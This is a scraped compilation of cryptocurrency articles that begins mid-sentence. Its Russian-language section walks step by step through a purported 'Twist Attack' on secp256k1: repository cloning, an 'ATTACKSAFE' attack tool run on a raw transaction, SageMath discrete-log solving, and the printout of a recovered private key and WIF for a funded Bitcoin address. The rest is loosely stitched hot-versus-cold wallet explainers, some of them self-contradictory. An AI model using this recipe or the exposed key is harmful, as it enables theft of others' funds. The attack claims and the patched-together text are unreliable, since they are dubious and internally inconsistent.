devices, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play vital roles in securing the ecosystems they run in. https://cryptodeeptech.ru/blockchain-attack-vectors/ Majority is not Enough: Bitcoin Mining is Vulnerable https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/PNDBjoT83zA Source: https://cryptodeep.ru/log4j-vulnerability
  4. CRYPTO DEEP TECH Не так давно пакет elliptic (6.5.4) для стандартных эллиптических кривых был уязвим для различных атак, одним из которых является Twist Attack. Криптографическая проблема была в реализации secp256k1. Нам известно что криптовалюта Биткоин использует secp256k1 и эта атака не обошла Биткоин стороной, согласно уязвимости CVE-2020-28498 подтверждающие стороны транзакции алгоритма ECDSA через определенные точки на эллиптической кривой secp256k1 передавали частичные значение приватного ключа (более простые подгруппы состоящие от 5 до 45 bit ) которые называются секстическими поворотами [sextic twists] этот процесс настолько опасен что раскрывает зашифрованные данные после выполнения ряда операций ECC. В этой статье мы реализуем Twist Attack на примере и покажем как с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Сохраним в файле: RawTX.txt RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([34618671789393965854613640290360235391647615481000045539933705415932995630501, 99667531170720247708472095466452031806107030061686920872303526306525502090483]) Q21 = E2([68702062392910446859944685018576437177285905222869560568664822150761686878291, 78930926874118321017229422673239275133078679240453338682049329315217408793256]) Q22 = E2([36187226669165513276610993963284034580749604088670076857796544959800936658648, 78047996896912977465701149036258546447875229540566494608083363212907320694556]) Q31 = E3([14202326166782503089885498550308551381051624037047010679115490407616052746319, 30141335236272151189582083030021707964727207106390862186771517460219968539461]) Q32 = E3([92652014076758100644785068345546545590717837495536733539625902385181839840915, 110864801034380605661536039273640968489603707115084229873394641092410549997600]) Q33 = E3([13733962489803830542904605575055556603039713775204829607439941608751927073977, 70664870695578622971339822919870548708506276012055865037147804103600164648175]) Q41 = E4([46717592694718488699519343483827728052018707080103013431011626167943885955457, 6469304805650436779501027074909634426373884406581114581098958955015476304831]) Q61 = E6([47561520942485905499349109889401345889145902913672896164353162929760278620178, 23509073020931558264499314846549082835888014703370452565866789873039982616042]) Q62 = E6([54160295444050675202099928029758489687871616334443609215013972520342661686310, 61948858375012652103923933825519305763658240249902247802977736768072021476029]) Q63 = E6([80766121303237997819855855617475110324697780810565482439175845706674419107782, 43455623036669369134087288965186672649514660807369135243341314597351364060230]) Q64 = E6([27687597533944257266141093122549631098147853637408570994849207294960615279263, 8473112666362672787600475720236754473089370067288223871796416412432107486062]) RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 5663673254 229 19231 43549 11713353 47161820 13016 6068 1461826 5248038982 9034433903442 PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617 Откроем bitaddress и проверим: ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6 HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617 https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/ BALANCE: $ 775.77 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/S_ZUcM2cD8I Источник: https://cryptodeep.ru/twist-attack Криптоанализ
  5. CRYPTO DEEP TECH In the last article: “Blockchain Attack Vectors & Vulnerabilities to Smart Contracts” we reviewed all known attacks on the blockchain, in this article we will talk about crypto threats again and we will talk about identifying vulnerabilities for Cold wallets, as well as for Hot wallets. Blockchain is the underlying tech layer made up of a decentralized ledger, and a very secure data structure as there are a lot of distributed nodes that participate in the consensus algorithm. In order to hack the blockchain, hackers should exploit vulnerabilities in a lot of decentralized nodes. The basic security assumption of blockchain is that it is impossible to hack so many nodes to change the state of the blockchain. If blockchain tech is so secure, how could it be hacked? The Achilles Heal of the technology is the centralized nature of institutional users that manage large amounts of crypto assets (money) for their clients, while the only thing that stays between the money and the hackers is the private key. The private key should be used to sign, on blockchain transactions, the same way that a manual signature could be used to sign traditional checks. If someone steals the institutions’ private key they can create a transaction on their behalf and steal the money. Unlike bank systems – once a hacked transaction is created there is no way to reverse it – the money is literally stolen. Why is it important to store and safeguard your private key? Whoever holds the private keys has complete control over the assets associated with that key. Because blockchain transactions are instantaneous and irrevocable, users aim to keep their private key secret. The private key is only generated once, so misplacing a private key effectively renders useless all the crypto assets associated with that address. Although the optimal custody scenario has yet to be defined, it is undisputed that control of the private key is of paramount concern. In fact, the private key is, in essence, the real asset. It’s intrinsic properties and powers mean there is no way to truly safeguard it without exception. Cold wallets “The vault of institutional custodians” are hardware devices that store Bitcoin or other cryptocurrencies initially, internet isolated, device. In theory, the cold wallet solution is reported to be the most secure way to store cryptocurrency. Some cryptocurrency users prefer to keep their digital assets in a physical “wallet,” most often a device that looks like a USB stick; they can only be accessed by being plugged directly into a computer and require an internet connection in order for a user to access and move their cryptocurrency funds. There are several popular cold wallets for commercial use such as Trezor, Ledger Nano S and for enterprise and institutional investors some other devices use a combination of: USB Ethernet SD card External thumb drives Dedicated air gapped machine with HSM Problems associated with the above hardware is usability and to gain access to the crypto asset you need to connect the cold wallet to a computer and therefore it is exposed to the internet. By doing so you are compromising the cold wallet system through the Internet connection, thus exposing it to potential attack vectors and eventually potential cyber theft. Using cold wallet storage is a necessary security precaution, especially when dealing with large amounts of Bitcoin and other crypto-assets. For example, a cryptocurrency exchange or crypto fund custodian would typically offer instant withdrawals and might be responsible for hundreds of thousands of Bitcoins and other crypto assets. To minimize the ability that hackers could steal the entire reserve in a security breach, the financial services operator would follow a standard protocol, by keeping the majority of the reserve in cold storage, while holding a smaller percentage of the assets available for day to day trade activity. Essentially they would not store the majority of digital assets’ private keys on their server or any other connected computer. The only amount kept on the server is the minimum required to cover anticipated customer withdrawals. Methods used to secure private keys for digital assets: Data encryption that protects wallets with a strong password Backups for digital wallets in case of computer crashes or fraud Cold wallets are not truly secure as, at some point, they need to send funds and by doing so they rely on bi-directional communication and are connected to the internet. This is when they can be compromised and be infected with malicious data and extremely vulnerable to attacks. Therefore all cold wallets become hot wallets dispelling the theory of total security for institutional custodians. Hot wallets today have an important role as they are capable of providing easy access to funds and processing automatic transactions, however private keys of the hot wallets are stored in a method that requires that they are always connected to the internet. There are different type’s of hot wallets that take a different approach on how to store private keys. In mathematical perspective, some duplicate private keys between different participants and other divide a private key between the participant. In other words, hot wallets today tackle the security risk by distributing private keys. The Hot wallets participants maintain control of their private keys, so the cryptocurrency assets in the hot wallet remain under the holder’s control. However, the assets remain vulnerable to hacking, as a malicious person or group which gains access to your computer or smartphone would theoretically also be able to drain your wallet via getting access to the private key. Hot wallet’s primary advantage is that it can be used for automatic and fast access transactions. Individuals looking to actually make purchases with their cryptocurrency assets might choose to use a hot wallet, for instance, as the holdings in that wallet can be transferable across the internet and in general, the number of crypto assets is at a high enough value, therefore it is not worth the time and money that hackers would invest to steal. On the other hand, hot wallets are definitely vulnerable to security breaches as they have ongoing access to the internet. Different types of hot wallets all store the private keys on internet connected applications: Basic Hot wallet – Direct connection of the private key on the Internet Multisig Native Wallet – duplicates private keys – you only need to compromise two participants in order to gain access Multiparty computation (MPC) – Distributes private key between 2-5 participants If we look at the Multisig method even with 2-3 people or entities having to confirm a particular transaction, hacker groups will spend millions on institutional targets and they only require attack vectors for 2 out of 3 in order to compromise the security. Hacker groups are willing to do this as they stand to gain hundreds of millions in stolen crypto assets. Even the MPC methodology is vulnerable to a variety of attack vectors. With the MPC approach, multiple non-trusting computers can each conduct computation on their own unique fragments of a larger data set to collectively produce a desired common outcome without any one node knowing the details of the others’ fragments. The private key that executes the transaction is then, a collectively generated value; the proponents of MPC maintain that at no point is a single computer responsible for an actual key. MPC based wallets are said to be a better solution to any hardware or multisig wallets in the market. They are mathematically proven to be safer, completely off-chain, providing higher flexibility and are generally ledger agnostic. Unfortunately, even with the fragments on multiple devices, it is still not an entirely safe solution because sophisticated hackers might be able to linger within a cluster of machines long enough to trace and reconstruct a key. If they manage to compromise one single employee machine or server they will be able to move laterally in the network and compromise other devices which are a part of the signature method. So this can also be proved false as hacker groups are sophisticated enough to find the vulnerabilities in this method and are willing to spend millions to steal billions. Using the above solutions could essentially prevent a rogue employee from stealing keys on-site, or from a cold-storage facility, or from any hardware device managed entirely by the company. There are mpc wallet providers that try to limit an attacker or a rogue employee from entering a single network and collecting all of the cryptographic information they would need to authorize and sign an illegal transaction, however, this solution is also not 100% secure and merely mitigating attack vectors is just not an option when billions are at stake. Why should the industry care? As of writing this article the total market cap for cryptocurrencies has exceeded $218 billion and is now in the 10th year of existence. In this past 10 years there have been many notable hacks. All institutions with custody of large amounts of crypto assets have a responsibility to their investors to ensure the most robust security options are deployed throughout their enterprise. Furthermore, the hacks also lead to various other cyber damage Theft of assets – irreversible Reputation damage Theft of private customer data Loss of jobs Closing down the business But that’s a different article… Although there is a lot of volatility in the market which in part is driven by FOMO and media hype, it is critical to acknowledge that a major factor is the security of digital assets and this can affect the value of a cryptocurrency or an exchange asset valuation fundamentally altering the entire ecosystem. Key Takeaways: A hot wallet is always connected to the internet; hence it’s prone to online attacks – but it’s more convenient for daily use. A cold wallet is mostly not connected to the internet; hence, it’s less prone to online attacks – but it’s less convenient for regular use. When choosing a wallet, you should consider the security, convenience, fees, supported coins, and insurance factors. If you are planning to buy digital assets, deciding how and where to store them is not an option, it’s a necessity. Unlike fiat currencies, cryptocurrencies live on the blockchain and require a proper storage platform known as a wallet. These wallets give you access to your crypto holdings through public and private keys. You use a public key to send and receive cryptocurrencies and a private key to confirm transactions and prove ownership of a crypto wallet. You can think of your public key as your bank account number and your private key as your pin. The main difference between hot vs. cold wallets is that the former stores private keys online while the latter stores them offline. This article takes a deep dive into the hot and cold wallet debate, considerations when choosing a wallet, and using both hot and cold wallets to manage your crypto portfolio. What is a Hot Wallet? A hot wallet is a software wallet that stores public and private keys online. You can access it through your computer or smartphone when connected to the internet. Hot wallets are more convenient for daily use as you don’t have to plug them in and out to use them – you just need an internet connection. They are also typically free to download and use, complete with a user-friendly interface that makes it easy for anyone to get started. Hot wallets are vulnerable to attacks because they store public and private keys online, which exposes you to risks like phishing and other scams. Types of Hot Wallets There are two types of hot wallets – exchange-based, where a user opens an account with a centralized exchange that acts as the custodian of the users’ funds in their care, and non-custodial software hot wallets. Exchange-Based Wallets Exchange-based wallets are part of a centralized exchange. Centralized exchanges are custodial institutions that hold the private keys to their users’ addresses. This means that customers of such custodial financial platforms are not in total custody of their assets, as these are deposited into hot and cold wallets held by the institution. Unfortunately, this exposes users to the risk of the exchange engaging in certain activities that result in the loss of customers’ funds, as seen in the case of FTX in November 2022. Moving forward, there is an industry wide push for more transparency and to hold custodial institutions accountable for their customers’ tokens with the introduction of Proof of Reserves. While there is an overall drop in centralized exchange activity, exchange-based wallets are still popular, especially with retail investors, as they make it easy for users to buy and sell cryptocurrency with fiat money. Also, in the event you lose your log-in details, access to your wallet can be restored by contacting the exchange’s customer service. Non-Custodial Software Hot Wallets Non-custodial software hot wallets can be accessed through mobile, browser or desktop applications.. Most of the time, they’re available across all three. In the case of these hot wallets, users are responsible for their own private keys and have full control over their funds. While this means your funds are safe in the event of a bank run, as they’re not stored in a custodial institution, if you lose your seed phrase, you will no longer be able to access your wallet and the crypto stored within. What is a Seed Phrase? A seed phrase is also known as a recovery phrase. This is a random list of 12, 18, or 24 words that can be used as a master key to recover crypto assets on-chain. Seed phrases generate the private key, which in turn are used to generate the public key. Wallet software typically generates a seed phrase, instructing the user to write it down before storing it safely. The seed phrase acts as a master key to unlock the user’s access to their wallet, so it must be stored safely and never online. When it comes to storing your seed phrase, don’t just write it on a piece of paper, which will fade over time or possibly be destroyed by water and fire. Instead, use crypto steel to record your seed phrase, and make multiple copies as backup. Never store your seed phrase on a password manager or anywhere online or on your devices. That includes not taking a photo of it, or putting it in a google doc or note. Examples of Hot Wallets MetaMask – Best for Exploring the Ethereum Ecosystem MetaMask is one of the most popular hot wallets in the crypto space and supports all EVM-compatible tokens. It’s easy to use and is available on desktop and mobile devices. Besides, it has extra in-built features for swapping, sending, and receiving crypto and collecting non-fungible tokens (NFTs) across networks. Exchange-Based Wallets – Easy Fiat On-Ramp Exchange-based hot wallets are similar to MetaMask, mostly supporting desktop and mobile devices. Exchange-based wallets connect to most banks to ensure easy onboarding, allowing new crypto users to directly buy crypto using their bank accounts instead of brokers. You may (or may not) have to open an account with the exchange to use their wallet services. However, as mentioned above, these exchange-based wallets are custodial, which means the exchange essentially holds your private key and your coins, promising you that you’ll be able to withdraw your coins when you want to. Exodus – Best for Desktop Exodus is the best hot wallet for desktops due to its high transaction speed, ease of use, and diverse client functionalities it provides. It’s one of the most visually appealing and intuitive wallets in the crypto space. It started as a desktop-only wallet but has expanded to support mobile devices. However, the Exodus desktop app for Windows, Linux, and Mac operating systems, is still the wallet’s primary offering. What is a Cold Wallet? A cold or hardware wallet is a physical device that stores your private keys offline, costing anywhere between $50 and $250. Cold wallets are the most secure type of crypto wallet, as they are not connected to the internet and are therefore unlikely to be compromised by hackers (unless they have access to your private keys AND the hardware wallet). Hardware wallets are physical devices that may resemble a USB stick or hard drives, which work by storing your pass codes, PINs and private keys on the device itself. In fact, even if the computer is infected with malware, the cold wallet remains safe as its private keys are held in a chip that never connects to the internet. So even if your computer is hacked or your online wallet is compromised, your coins will still be safe… unless your passcode and device are stolen. However, as cold wallets are physical objects, that also opens them up to the risk of loss through careless handling. In the unfortunate event that your crypto hardware wallet is lost or stolen, you can use your seed phrase to regenerate your private keys. So remember to keep your seed phrases safe, offline, and on hard copy. As cold wallets are ideal for long-term crypto storage, they’re better suited for hodling crypto than trading funds. Ledger Source: Ledger Nano X Ledger is one of the most popular crypto hardware wallet providers, offering the Ledger Nano X, Ledger Nano S and the Ledger Nano S plus wallets. These devices are about the size of a thumb drive, running on the Ledger operating system called the Blockchain Open Ledger Operating System. It also has an in-built clear OLED display screen interface, and two navigation buttons for confirming transactions. Ledger comes complete with a Ledger Live mobile app and a high level of security with its secure element chip used to store cryptographic data. Their flagship model, the Ledger Nano X, offers cryptocurrency compatibility of more than 5,500 tokens. Trezor Trezor is another well-known hardware wallet that offers the Trezor One and Trezor Model T. The Trezor Model T offers compatibility with 1,456 coins and tokens, and comes with the desktop, browser and Android Trezor Suite. Trezor Suite is a user interface which lets you search and buy cryptocurrencies, manage your holdings, and send crypto securely. While this improves the user experience, there is the potential to introduce security vulnerabilities as you are using internet-enabled devices. Considerations When Choosing a Wallet Depending on your needs, you may opt for a hot wallet, a cold wallet, or both. We’ve summed up how the three types of wallets covered above compare against each other in this table: Security Security is a core feature when choosing a crypto wallet. Blockchain technology is known for its secure and immutable nature; ensuring your wallet has the best security features is necessary. Cold wallets are more secure than hot wallets since they are not always connected to the internet with exposure to potential cybersecurity risks like phishing or other hacks and scams. Besides, ensure your wallet has two-factor authentication (2FA) functionality to prevent unauthorized access to your assets. Convenience Since cold wallets store private keys offline, they involve plugging in physical devices and linking to web-based accounts to transfer funds. On the other hand, hot wallets live online; hence they are much easier to use for everyday transactions, like day trading. Additional Transaction Fees You’ll be still subjected to gas fees, regardless of whichever wallet you’re using. However, exchange-based wallets may include an additional charge that is derived from gas prices, although this fee may be waived if you are holding or staking the exchange’s native token. Before downloading or purchasing any wallet, check their service charges first. Supported Coins The wallet you plan to use may not support the coin you want to invest in. Some wallets support only one coin! Consider Mycelium, for instance. Despite having exceptional functionalities, it only supports Bitcoin. Therefore, be sure to check the wallet’s list of supported coins and tokensbefore using it to avoid disappointments. Insurance Some custodians provide asset insurance for users who incur losses through a technical problem or theft. Custodians differ in insurance policies, but selecting one that insures your assets in collaboration with a financial institution is advisable. For example, Binance provides insurance for USD deposits of up to $250,000 for U.S. customers. It has partnered with the Federal Deposit Insurance Corporation (FDIC) to implement this policy. Using Hot and Cold Wallets to Manage Your Crypto Portfolio Hot wallets are more convenient for daily use than cold wallets. On the other hand, cold wallets guarantee maximum security than hot wallets. Both wallets support a broad range of cryptocurrencies. Therefore, the ideal wallet for you relies on whether you prioritize the safety of your funds over the convenience of using a wallet regularly. You can enjoy both benefits by combining both methods. For instance, you can hold a small percentage of funds in a hot wallet for trading purposes and keep the rest of your funds in a cold wallet as a long-term investment. As a blockchain network participant, o party can rely on so-called “wallets” to manage its accounts and interaction with the blockchain. A party has multiple keys. Problem A party’s wallet is vulnerable to malicious attacks leading to key theft. If compromised, an attacker can use the key to issue transactions in that party’s identity. How to prevent the compromisation of keys? Forces: Security – A key may be hacked when being stored in a device, especially when connected to the Internet. Usability – Some keys may be frequently used by blockchain participants while other keys may be used infrequently or might act as backup. Solution Users can choose to store keys in 2 types of wallets, namely hot wallet and cold wallet. Hot wallet typically refers to the blockchain gateways that are connected to the Internet. Hot and Cold Wallet Storage Pattern Through a hot wallet, a user is able to directly issue transactions to the blockchain. Hence, a hot wallet typically holds frequently used keys. Cold wallet refers to key storage that is kept off-line to minimise potential attacks. Thus, a clod wallet typically contains rarely used keys. A cold wallet can be any device disconnected from the Internet or even a paper recording an entity’s keys. When a key stored in the cold wallet is required to sign a transaction, the user needs to connect the cold wallet device to a computer and copy-paste the key in the relevant field. It is also possible to automate the migration of keys between the 2 wallets based on their frequency of use, e.g., least recently used and most frequently used. Also, a certain key can be marked as critical such that it primarily stays in the cold wallet. When it is required to sign a transaction it can be copied to the hot wallet. However, as soon as the transaction is signed it should be deleted from the hot wallet. In certain application settings, blockchain platforms, and wallet implementations, it is also possible to sign transactions entirely on the cold wallet and use the hot wallet to issue/relay the signed transactions to the blockchain. Benefits Secure storage – Cold wallets are isolated from the Internet; hence, provide secure storage for keys. Usability – Such a secure storage also preserves the usability of keys, as once a cold wallet is connected to the Internet (either directly or via a middleware), a party can utilise those keys. Drawbacks Security – Hot wallets store one’s secret keys online hence are more vulnerable to theft. A cold wallet becomes more vulnerable as soon as it is connected to the hot wallet to copy/migrate a key. Usability – Cold wallets are more secure than hot wallets but less convenient to use, as the user has to connect to the cold wallet. Related patterns In master and sub key generation pattern master key can be kept in the cold wallet while sub-keys can be stored in hot wallet. Key sharding pattern could be used in a wallet application to split and merge a key to minimise its compromise. When being integrated into wallet applications, predefined delegates in delegate list pattern can replace key ownership of a compromised key. Known uses MyEtherWallet is a hot wallet with a graphical interface for instant payment and withdrawal in Ethereum. Trezor is a cryptocurrency hardware wallet, designed to store and encrypt users’ coins, passwords, and other digital keys. It is a single-purpose computer with independent memory to save all private data. Ledger provides hardware wallet products to stores users’ private keys in a secure hardware device, protecting the cryptocurrencies. Explore the different crypto storage options What are the pros and cons of each wallet? A hot wallet refers to any cryptocurrency wallet connected to the internet. Generally, hot wallets are easier to set up, access, and accept more tokens. But they are also more vulnerable to hacker attacks, possible regulations, and other technical vulnerabilities. Cold Storage refers to any cryptocurrency wallet that is not connected to the internet. Overall, a cold wallet is more secure, but it doesn’t accept as many cryptocurrencies as hot wallets. Should I Get a Cold Wallet? If you are going to own Bitcoin, Ethereum, or other cryptocurrencies worth more than $100, you could buy a cold wallet right now — this is how much it costs. Maybe you’ve heard people say, “Bitcoin gives you this opportunity of being your own bank”? There are advantages and disadvantages to this responsibility. Generally, cryptocurrencies have fewer middleman fees, less messy banking regulations, etc. Still, it is your responsibility to ensure the safety of your assets. Overall, as a rule, you should leave as much money in your hot wallet as you would with a traditional leather wallet that you keep in your pocket. Think of it this way, if a thief was about to steal your regular wallet, you would only lose the money you have in your pocket, not the money in your bank account. In short, here’s an analogy that can help you: a hot wallet can be thought of as a pocket wallet that you walk around town with; a cold wallet is a bank deposit. Pros & Cons of Hot Wallets Using a hot wallet will give you the following benefits: By entering your pin and access number into the wallet, you quickly access your coins. The investment cost is lower. It has an extensive portfolio of applications or software that function as a hot wallet. You need to set a PIN code or a security code to use it. They allow you to connect to any platform so you can operate and trade. Using one of these wallets may have the following disadvantages: Higher risk of theft as money is stored in the cloud and is more vulnerable to cyber crooks. It needs to be connected to the internet all the time. Otherwise, it can’t be supported, so it could be a big problem if the internet connection fails. Pros & Cons of Cold Wallets Using this wallet will give you the following benefits: This type of wallet works without the internet, giving you a high level of security since many thefts take place on the internet. A cold wallet supports ERC20 or other tokens standards, which can support an unlimited number of tokens.. You need to set a PIN code or a security code to use it. You can take your device anywhere. Using one of these wallets may generate the following disadvantages: There is a risk of losing your device. You cannot trade with these types of devices. You need to invest around $100 to get it. Like any physical device, it is prone to failure, corruption, or reading problems. Remember that if you want to trade, a hot wallet is the better option. Still, we recommend encrypting it as best you can and choosing the best software for the most significant security. On the other hand, if you are a non-trading investor and want the highest level of protection, a cold wallet will be a better choice. Hot and cold wallets are both necessities for safely storing your crypto assets. When the former is used to send and receive crypto tokens, the latter securely holds your accumulating cryptocurrencies without vulnerabilities. As hot wallets require an internet connection to send and receive tokens, they are largely at risk of crypto attacks that prove to be hugely expensive. So, it cannot hold a large sum of tokens. Here is where the usage of cold wallets comes into play. Utilizing both hot and cold wallets is a safe practice in crypto vulnerability management, leaving no loopholes for attackers. Let us understand the hot and cold wallet architecture and how it should be set up to mitigate the risk of vulnerabilities. What are hot wallets? What are cold wallets? Hot wallet vs Cold Wallet: Differences Hot and cold wallet setup How does hot and cold wallet interact? How do hot and cold wallet setups in big systems work? What are hot wallets? Hot wallets are crypto wallets that are always connected to the internet and are more easily accessible for users than cold wallets. They can be mobile, desktop or web-based wallets, and are user-friendly and facilitate easy transfer of currencies between crypto users. Private keys are kept and encrypted on the app itself in hot wallets and stored online. It has hidden vulnerabilities, and hackers can target it to break into the system. Due to its ease of use, it is the most preferred wallet for buying and trading cryptocurrencies or cashing out assets after a while. How does a hot wallet storage work? When you install a hot wallet storage into your computer or device, it allows you to buy, send and receive crypto assets without really holding any crypto. Rather it holds the private keys using which a user can initiate transactions. This is possible, as it interacts with the blockchain storing your assets. Metamask is one of the most popular hot wallets available today. So, we will explain how a hot wallet works using Metamask. Metamask is available as a web browser extension that acts as a bridge between the blockchain, especially Ethereum, and your browser. When you download and install Metamask and add it as your browser extension, you will be asked to either ‘import wallet’ or ‘create a wallet.’ Import wallet allows you to add an existing wallet by typing a secret recovery phrase, while the latter enables creating a new crypto wallet. If you create a new wallet, you need to set a new Metamask password to secure the app or platform on your device. This password can be a string of characters, face recognition, or even a fingerprint that you can regularly use to access the app, instead of a secret recovery phrase. Once you create a password, you must copy the secret backup phrase and paste it or write it down in a safe place. For each account you have in your Metamask wallet, you will be provided with a private key. You can unlock your cryptocurrencies using this private key. What are cold wallets? Cold wallets are hardware-based and exist offline. Although a cold wallet is not as convenient to use as a hot wallet, it is far more secure. Using this offline wallet keeps your keys entirely protected from online hackers. Cold wallets can be paper wallets or hardware devices. A paper wallet is a traditional way of keeping private and public keys written down or printed on paper. It is a safe way to store keys as it is not prone to phishing attacks. Hardware wallets are external devices in the form of a USB or Bluetooth device that stores your keys. As they offer less liquidity, cold wallets are best for people planning to buy and hold their crypto assets for a long period. To do transactions between an offline cold wallet and an online hot wallet, you need to connect the hardware device to another device with internet accessibility, mostly a computer, using a plug, then transfer the required amount from the cold wallet to the hot wallet. How does a cold wallet storage work? A cold wallet, on its own, cannot connect to a blockchain and complete a transaction. When a user wants to use a cold wallet for transactions, it needs to be connected to a device with an internet connection. However, this does not put your private key under security threat. Let us see how it works. A cold wallet storage can be roughly divided into two components, a cold wallet core and a cold gateway. While a cold wallet core has no internet access and is completely air-gapped, a cold gateway is connected to the internet. A transaction is created in the cold gateway in a cold wallet, which is then signed in the offline cold wallet core. So, if a user wants to send x number of tokens to another wallet, the transaction will be created in the cold gateway with an internet connection, but the transaction signing will be done offline. After the transaction is signed, it is disclosed or broadcast online in the cold wallet core. Let us take the example of the cold wallet ELLIPAL to understand this better. ELLIPAL is an air-gapped hardware wallet that is essentially a secure cold wallet. It is entirely isolated from the internet and is designed to prevent unauthorized access, hacks, malware and other online attacks. So, to initiate transactions, the users need to install the ELLIPAL mobile app, acting as a proxy for it to connect to the blockchain. The whole process of transactions via an ELLIPAL wallet can be summarized into the following steps: The user initiates a transaction on the app. The app asks for confirmation from the cold wallet. The hardware wallet signs the transaction via a private key. After approval, the app completes the transaction Hot wallet vs Cold Wallet: Differences Hot Wallet 